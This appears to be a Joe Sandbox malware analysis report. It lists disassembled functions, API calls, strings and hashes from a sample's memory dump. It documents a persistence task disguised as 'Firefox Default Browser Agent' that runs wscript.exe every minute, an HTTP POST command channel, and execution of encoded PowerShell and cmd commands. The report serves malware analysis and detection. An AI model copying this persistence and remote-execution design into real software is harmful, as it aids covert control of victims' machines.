connect.WS2_32(00000000,?,00000010), ref: 005E64BB
closesocket.WS2_32(00000000), ref: 005E64C3
select.WS2_32(00000000,?), ref: 005E64F8
recv.WS2_32(?,?,00000400,00000000), ref: 005E6534
send.WS2_32(00000000,?,00000000,00000000), ref: 005E655A
select.WS2_32(00000000,00000002,00000000,00000000,00000000), ref: 005E658C
closesocket.WS2_32(00000000), ref: 005E65A6
closesocket.WS2_32(00000000), ref: 005E65AD
GetProcessHeap.KERNEL32(00000000,?), ref: 005E65B9
HeapFree.KERNEL32(00000000), ref: 005E65C0

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: closesocket$Heapconnecthtonsinet_ptonselectsocket$FreeProcessrecvsend
String ID:
API String ID: 2202494921-0
Opcode ID: 9931024012ed0778c971a5af3ef71d152553fadbda33881e1e6ce7e4ac3294a1
Instruction ID: 266aaf74e65010d4353f69e47d76bc3d69d594a6e4b8a6b17cdb0bd92378717b
Opcode Fuzzy Hash: 9931024012ed0778c971a5af3ef71d152553fadbda33881e1e6ce7e4ac3294a1
Instruction Fuzzy Hash: AF51C071604344ABE718DF64CC89B6FB7E8BF98765F000A1AF6909B1E1D7B0D905CB62

Function 005E93B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86memoryencryptionCOMMON

Download Yara Rule

APIs

CryptGenRandom.ADVAPI32(00000020,?), ref: 005E93C8

Part of subcall function 005E2840: GetProcessHeap.KERNEL32(00000008,AAAAAAAB,?,?,?,?,005E9415,00000000), ref: 005E2862
Part of subcall function 005E2840: HeapAlloc.KERNEL32(00000000,?,?,?,?,005E9415,00000000), ref: 005E2869

GetProcessHeap.KERNEL32(00000000,00000000), ref: 005E9425
HeapFree.KERNEL32(00000000), ref: 005E942C
wsprintfA.USER32 ref: 005E945F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 005E9498
HeapFree.KERNEL32(00000000), ref: 005E949B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 005E94A0
HeapFree.KERNEL32(00000000), ref: 005E94A3

Strings

%d|%s|%s|%s, xrefs: 005E9459
hhlT6dDn, xrefs: 005E9447

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocCryptRandomwsprintf
String ID: %d|%s|%s|%s$hhlT6dDn
API String ID: 4113358155-4055814786
Opcode ID: 5678ddc79723eb4466b4c12f9b4af366f9999262d88c13f4ec33ef40578dfd4d
Instruction ID: c8c256624b6ee374c3109611a287527814c3070626c0d2efdd4344e781f29c47
Opcode Fuzzy Hash: 5678ddc79723eb4466b4c12f9b4af366f9999262d88c13f4ec33ef40578dfd4d
Instruction Fuzzy Hash: 1A21C9719003886BEB18A7A19C4EFDF7F6DFF44715F040050F988A71D6EA60A909C7A2

Function 005E6C60 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95memorycomCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005E6C77
CoCreateInstance.OLE32(005E1020,00000000,00000001,005E1000,?), ref: 005E6C94
SysAllocString.OLEAUT32(\Mozilla), ref: 005E6CD4
SysFreeString.OLEAUT32(?), ref: 005E6D0B
SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 005E6D18
SysFreeString.OLEAUT32(00000000), ref: 005E6D2F

Strings

Firefox Default Browser Agent 318146B0AF4A39CB, xrefs: 005E6D13
\Mozilla, xrefs: 005E6CCF

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: String$AllocFree$CreateInitInstanceVariant
String ID: Firefox Default Browser Agent 318146B0AF4A39CB$\Mozilla
API String ID: 478541636-3211539605
Opcode ID: 3fe5ad5f73a8f9e4585c47dce69e9c974ca4aa4ff8ba82ccff76e1ac0b93f1a2
Instruction ID: c352fc57ba1d842ed611c357c548a04880f111479eba5f24cc186549c097f39a
Opcode Fuzzy Hash: 3fe5ad5f73a8f9e4585c47dce69e9c974ca4aa4ff8ba82ccff76e1ac0b93f1a2
Instruction Fuzzy Hash: 4C319434F00294AFD7089F69CC89B9E7FB8FF59395F004198E985AB251D6309D84CBA1

Function 005E6370 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 005E637D
OpenProcessToken.ADVAPI32(00000000), ref: 005E6384
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 005E6399
CloseHandle.KERNEL32(?), ref: 005E63A6
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 005E63D0
CloseHandle.KERNEL32(?), ref: 005E63DB

Strings

SeShutdownPrivilege, xrefs: 005E6392

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 158869116-3733053543
Opcode ID: 1b001b0896a196494da9da9460a267dd92ee7656c23e229c070f51f3eec2c3e2
Instruction ID: e2b7b1a45926c519a28f8455ad7ecc9eb8f3e6c8ab3cce277216bf1f226f947a
Opcode Fuzzy Hash: 1b001b0896a196494da9da9460a267dd92ee7656c23e229c070f51f3eec2c3e2
Instruction Fuzzy Hash: 5E018431A40259ABEB209BE0DD4DBAF7BBDFB14742F100054F944AA190D7705E08A7A1

Function 00F0993E Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00F099D9
FindNextFileW.KERNEL32(00000000,?), ref: 00F09A54
FindClose.KERNEL32(00000000), ref: 00F09A76
FindClose.KERNEL32(00000000), ref: 00F09A99

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 7849bd8f40af7fd6cac011affaabd3e0b8394ee385e992a79c7e09dea1ecf58b
Instruction ID: b2e4219db64f6ef0a20f61b9f4617fec11df4f1ab42e2a28bee25c1cf551c091
Opcode Fuzzy Hash: 7849bd8f40af7fd6cac011affaabd3e0b8394ee385e992a79c7e09dea1ecf58b
Instruction Fuzzy Hash: 9641D971E04519AFDB20DF68DC89AFAB7B9EB85314F008195E405D31C5F7749E84BB60

Function 00F04E89 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00F04E95
IsDebuggerPresent.KERNEL32 ref: 00F04F61
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F04F7A
UnhandledExceptionFilter.KERNEL32(?), ref: 00F04F84

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 228aa8c5db88b8ca21ed509c2b08f7529ceb55ec7fad09d8659d4724db77b89b
Instruction ID: 310b05167c42cf0b2725570761afad5fc11d1f7d933d4ad539fb580254bdc8cf
Opcode Fuzzy Hash: 228aa8c5db88b8ca21ed509c2b08f7529ceb55ec7fad09d8659d4724db77b89b
Instruction Fuzzy Hash: 053118B5D0521D9BDF20DF64DC497CDBBB8AF08300F1041AAE40CAB290E774AB84AF45

Function 00F076CB Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00F077C3
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F077CD
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00F077DA

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 12afa4d9db7e57655de6d7f8c09392e0ddf7613bf4fb42083377bd7176bc8f78
Instruction ID: 67aef571791e28afadcec70d448c866b4f69b8321623c2c91d436ef41f3e88d6
Opcode Fuzzy Hash: 12afa4d9db7e57655de6d7f8c09392e0ddf7613bf4fb42083377bd7176bc8f78
Instruction Fuzzy Hash: 1A31C474D0121DABCB21EF24DD897DDBBB8BF08710F5041DAE41CA62A0E774AB85AF44

Function 005E7710 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

0, xrefs: 005E7770
9{^, xrefs: 005E78F7

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID:
String ID: 0$9{^
API String ID: 0-603026723
Opcode ID: e0f188906904be60f46ede94d7db664411bc3ec97a434f4aaef92715dd7d9c75
Instruction ID: d57dbafe9856e868c762082d54c69037fd46846616c8b4a5a0921cdac01d525a
Opcode Fuzzy Hash: e0f188906904be60f46ede94d7db664411bc3ec97a434f4aaef92715dd7d9c75
Instruction Fuzzy Hash: 9A51C331E183DC8EDB1D8BED98542ECBFB1AF56200F5481BED8D6A7643D5344A09CB61

Function 00F0FBC1 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F0FBBC,?,?,00000008,?,?,00F0F7BF,00000000), ref: 00F0FDEE

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: e8bbdf9dcf0914e648cec97acded9b8815e032c1b737ebb1f438e24bdeeb52f7
Instruction ID: 5056cd22b96d3b34e95464e0275510c5485719ce4347e0e0f1180cf181bbda2a
Opcode Fuzzy Hash: e8bbdf9dcf0914e648cec97acded9b8815e032c1b737ebb1f438e24bdeeb52f7
Instruction Fuzzy Hash: 20B15F32910609DFD725CF28C486B647BE0FF45364F258668E899CF6E2C335E995EB40

Function 00F05125 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F0513B

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 0c7c97e1a86806d72a500bce02506a2ed5519d6ede01828d078420266b5cf6d8
Instruction ID: 7072dba46a897375a3ded89bb258ea1a172809b5b35d6b50835a99ac0669b87b
Opcode Fuzzy Hash: 0c7c97e1a86806d72a500bce02506a2ed5519d6ede01828d078420266b5cf6d8
Instruction Fuzzy Hash: 71515DB1E05619CBDB18CF58E9817AEBBF0FB48714F25806AD415EB290D3B4DA40EF50

Function 005E26A0 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 005E26A2

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: 060e678883ae1ae1e3e1dd9b7ef8e553030050d83a2ed3b597fea597c93ef94a
Instruction ID: c4dfd81f387a291bdc21881314b18715311e0d08556b8be6134efcc63387bbbb
Opcode Fuzzy Hash: 060e678883ae1ae1e3e1dd9b7ef8e553030050d83a2ed3b597fea597c93ef94a
Instruction Fuzzy Hash: 0631AE327105808BD70CCF3DECD666577E6F799310B06462AD99ACB2E0EA74B809DB45

Function 00F05016 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00005022,00F0482B), ref: 00F0501B

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 134a805ecef8f6099b8e80bc239975608c9979a83b81e9131f47057079d2c12a
Instruction ID: ddad56c9ecc93b2e6e33e0f7cfc3f02beb503a18c54f36ede88891cf2b8b74bf
Opcode Fuzzy Hash: 134a805ecef8f6099b8e80bc239975608c9979a83b81e9131f47057079d2c12a
Instruction Fuzzy Hash:

Function 00F0B779 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00F0B779

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 444f81f828a2fe71c3a325bbc08d8b64d4628a9fcde30decefbe3cc668824704
Instruction ID: c8482494d3599db1393996b777e9aed38f400967f6bb23b9ac4006342bfdd94b
Opcode Fuzzy Hash: 444f81f828a2fe71c3a325bbc08d8b64d4628a9fcde30decefbe3cc668824704
Instruction Fuzzy Hash: 77A012306401058F4340CF315A0528935A85600590302C0145005D1020DA3080006F01

Function 005E47D0 Relevance: .8, Instructions: 750COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b5d2beb5bb9b280eeb9f4044084728c6b7e833c8d3f3f0238baefbe539ccc67
Instruction ID: 4aa1a14009a60b66d78b2efcfd414a6725fb52ae7e13dffd4a745cb294eb2b0c
Opcode Fuzzy Hash: 9b5d2beb5bb9b280eeb9f4044084728c6b7e833c8d3f3f0238baefbe539ccc67
Instruction Fuzzy Hash: 86723B348242D98ACB1DEB65D86E6ECBB35BF62300F4411FDD48A13956BF711B89CE60

Function 005E43D0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
Instruction ID: 30c601da28732d0c86addaa5ccfa9ad3a7112a4d71085d051946d182f3a63628
Opcode Fuzzy Hash: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
Instruction Fuzzy Hash: D95164B1A11A10CFCB68CF2EC591556BBF1BF8C324355896EA98ACB625E334F840CF51

Function 005E6D50 Relevance: 70.4, APIs: 31, Strings: 9, Instructions: 426
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 005E6D6E
CoCreateInstance.OLE32(005E1020,00000000,00000001,005E1000,?), ref: 005E6D9B
SysAllocString.OLEAUT32(005E1498), ref: 005E6DE1
SysFreeString.OLEAUT32(?), ref: 005E6E1E
SysAllocString.OLEAUT32(\Mozilla), ref: 005E6E2F
SysFreeString.OLEAUT32(00000000), ref: 005E6E51
SysAllocString.OLEAUT32(\Mozilla), ref: 005E6E62
SysFreeString.OLEAUT32(00000000), ref: 005E6E78
SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 005E6E86
SysFreeString.OLEAUT32(00000000), ref: 005E6E97
SysAllocString.OLEAUT32(The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic), ref: 005E6ED4
SysFreeString.OLEAUT32(00000000), ref: 005E6EE3
SysAllocString.OLEAUT32(Mozilla), ref: 005E6EEA
SysFreeString.OLEAUT32(00000000), ref: 005E6EF9
SysAllocString.OLEAUT32(PT0S), ref: 005E6F4E
SysFreeString.OLEAUT32(00000000), ref: 005E6F5D
SysAllocString.OLEAUT32(Trigger1), ref: 005E6FCF
SysFreeString.OLEAUT32(00000000), ref: 005E6FDE
SysAllocString.OLEAUT32(2023-01-01T12:00:00), ref: 005E6FE5
SysFreeString.OLEAUT32(00000000), ref: 005E6FF4
SysAllocString.OLEAUT32(PT1M), ref: 005E7013
SysFreeString.OLEAUT32(00000000), ref: 005E7022
SysAllocString.OLEAUT32(C:\Windows\System32\wscript.exe), ref: 005E70A3
SysFreeString.OLEAUT32(00000000), ref: 005E70B2
SysAllocString.OLEAUT32(?), ref: 005E70BC
SysFreeString.OLEAUT32(00000000), ref: 005E70CB
VariantInit.OLEAUT32(?), ref: 005E70FA
SysAllocString.OLEAUT32(005E113C), ref: 005E710E
SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 005E711F
SysFreeString.OLEAUT32(00000000), ref: 005E715C
VariantClear.OLEAUT32(?), ref: 005E7162

Strings

Firefox Default Browser Agent 318146B0AF4A39CB, xrefs: 005E6E81, 005E7110
Mozilla, xrefs: 005E6EE5
2023-01-01T12:00:00, xrefs: 005E6FE0
PT1M, xrefs: 005E700E
The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic, xrefs: 005E6ECF
Trigger1, xrefs: 005E6FCA
C:\Windows\System32\wscript.exe, xrefs: 005E709E
PT0S, xrefs: 005E6F49
\Mozilla, xrefs: 005E6E2A, 005E6E5D

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: String$Alloc$Free$Variant$Init$ClearCreateInstance
String ID: 2023-01-01T12:00:00$C:\Windows\System32\wscript.exe$Firefox Default Browser Agent 318146B0AF4A39CB$Mozilla$PT0S$PT1M$The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic$Trigger1$\Mozilla
API String ID: 3904693211-3377861604
Opcode ID: 461b4af9724f2a7d211998b891fdc9a082219d0cc31b56b065405d0b3f4b68b4
Instruction ID: cb8549d326701b0c3378c3811601de5df591c59f4185d31fafab88bbea334446
Opcode Fuzzy Hash: 461b4af9724f2a7d211998b891fdc9a082219d0cc31b56b065405d0b3f4b68b4
Instruction Fuzzy Hash: C6F11A70A00259AFDB14DFA9C888FAEBBB8FF49344F104158F549EB250DB71AD45CBA1

Function 005E8120 Relevance: 61.6, APIs: 21, Strings: 14, Instructions: 350
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 005E8146
GetTickCount64.KERNEL32 ref: 005E8154

Part of subcall function 005E6830: ObtainUserAgentString.URLMON(00000000,?,?), ref: 005E6852
Part of subcall function 005E6830: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 005E6872
Part of subcall function 005E6830: InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005E68D8
Part of subcall function 005E6830: InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 005E6911
Part of subcall function 005E6830: InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005E692E
Part of subcall function 005E6830: HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 005E6967
Part of subcall function 005E6830: InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 005E6990

Sleep.KERNEL32(00000000), ref: 005E81A6
lstrcmpA.KERNEL32(00000000,INIT), ref: 005E81B3
StrToIntA.SHLWAPI(00000000), ref: 005E8276
StrToIntA.SHLWAPI(00000000), ref: 005E82BB
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005E82F7
PathCombineW.SHLWAPI(?,?,WindowsPowerShell\v1.0\powershell.exe), ref: 005E8310
wnsprintfW.SHLWAPI ref: 005E8324
ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 005E8360
wnsprintfW.SHLWAPI ref: 005E8374

Part of subcall function 005E5780: GetProcessHeap.KERNEL32(00000000,00000000,005E86C5), ref: 005E5787
Part of subcall function 005E5780: HeapFree.KERNEL32(00000000), ref: 005E578E

GetModuleHandleA.KERNEL32(kernel32), ref: 005E8397
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005E83A5
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005E83BA
LoadLibraryA.KERNEL32(shell32,ShellExecuteW), ref: 005E841B
GetProcAddress.KERNEL32(00000000), ref: 005E8422
wsprintfA.USER32 ref: 005E8482
wnsprintfA.SHLWAPI ref: 005E84AE

Part of subcall function 005E2950: GetProcessHeap.KERNEL32(00000008,?), ref: 005E2962
Part of subcall function 005E2950: HeapAlloc.KERNEL32(00000000), ref: 005E2969

Sleep.KERNEL32(00000000), ref: 005E86D6

Strings

ShellExecuteW, xrefs: 005E8411
%s|%s, xrefs: 005E84A4
WindowsPowerShell\v1.0\powershell.exe, xrefs: 005E82FD
%d|%s, xrefs: 005E8140
INIT, xrefs: 005E81AD
/c %S, xrefs: 005E836A
kernel32, xrefs: 005E8384
shell32, xrefs: 005E8416
-enc %S, xrefs: 005E831A
%ComSpec%, xrefs: 005E835B
Wow64DisableWow64FsRedirection, xrefs: 005E839F
Wow64RevertWow64FsRedirection, xrefs: 005E83AB
%d|%s|%.16s|, xrefs: 005E847C
open, xrefs: 005E8430

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: HeapInternet$AddressProcwnsprintf$OpenOptionProcessSleepwsprintf$AgentAllocByteCharCombineConnectCount64DirectoryEnvironmentExpandFreeHandleHttpLibraryLoadModuleMultiObtainPathQueryRequestStringStringsSystemTickUserWidelstrcmp
String ID: -enc %S$ /c %S$%ComSpec%$%d|%s$%d|%s|%.16s|$%s|%s$INIT$ShellExecuteW$WindowsPowerShell\v1.0\powershell.exe$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32$open$shell32
API String ID: 1920831074-1153165106
Opcode ID: 705bb8af4e27980651be8d93c891a6723e4fbc6bf681520760ff482ba4028dd7
Instruction ID: bb6838876ef0298db8af09a07016ded1227131dd5431235fa283ab72d0646fe1
Opcode Fuzzy Hash: 705bb8af4e27980651be8d93c891a6723e4fbc6bf681520760ff482ba4028dd7
